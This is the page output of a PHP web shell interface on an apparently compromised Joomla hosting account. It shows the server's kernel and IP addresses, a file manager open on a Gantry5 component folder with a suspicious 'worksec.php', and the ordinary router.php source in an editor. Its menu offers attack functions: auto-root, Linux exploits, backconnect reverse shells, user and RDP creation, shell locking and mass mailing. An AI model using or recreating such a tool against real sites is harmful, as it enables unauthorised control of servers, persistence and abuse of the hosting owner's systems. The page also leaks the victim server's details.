Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
components /
com_gantry5 /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.htaccess
420
B
-rw-r--r--
MD5SUMS
246
B
-rw----r--
gantry5.php
3.37
KB
-rw-r--r--
router.php
2.03
KB
-rw-r--r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : router.php
<?php /** * @package Gantry 5 * @author RocketTheme http://www.rockettheme.com * @copyright Copyright (C) 2007 - 2021 RocketTheme, LLC * @license GNU/GPLv2 and later * * http://www.gnu.org/licenses/gpl-2.0.html */ defined('_JEXEC') or die (); use Joomla\CMS\Application\CMSApplication; use Joomla\CMS\Component\Router\RouterBase; use Joomla\CMS\Factory; /** * Class Gantry5Router */ class Gantry5Router extends RouterBase { /** * Build the route for the Gantry5 component * * @param array &$query An array of URL arguments * @return array The URL arguments to use to assemble the subsequent URL. */ public function build(&$query) { $segments = array(); unset($query['view']); return $segments; } /** * Parse the segments of a URL. * * @param array &$segments The segments of the URL to parse. * @return array The URL attributes to be used by the application. */ public function parse(&$segments) { if ($segments) { return array('g5_not_found' => 1); } return array(); } } /** * Content router functions * * These functions are proxys for the new router interface * for old SEF extensions. * * @param array &$query An array of URL arguments * * @return array The URL arguments to use to assemble the subsequent URL. */ function Gantry5BuildRoute(&$query) { /** @var CMSApplication $app */ $app = Factory::getApplication(); $router = new Gantry5Router($app, $app->getMenu()); return $router->build($query); } /** * Parse the segments of a URL. * * This function is a proxy for the new router interface * for old SEF extensions. * * @param array $segments The segments of the URL to parse. * @return array The URL attributes to be used by the application. */ function Gantry5ParseRoute($segments) { /** @var CMSApplication $app */ $app = Factory::getApplication(); $router = new Gantry5Router($app, $app->getMenu()); return $router->parse($segments); }
Close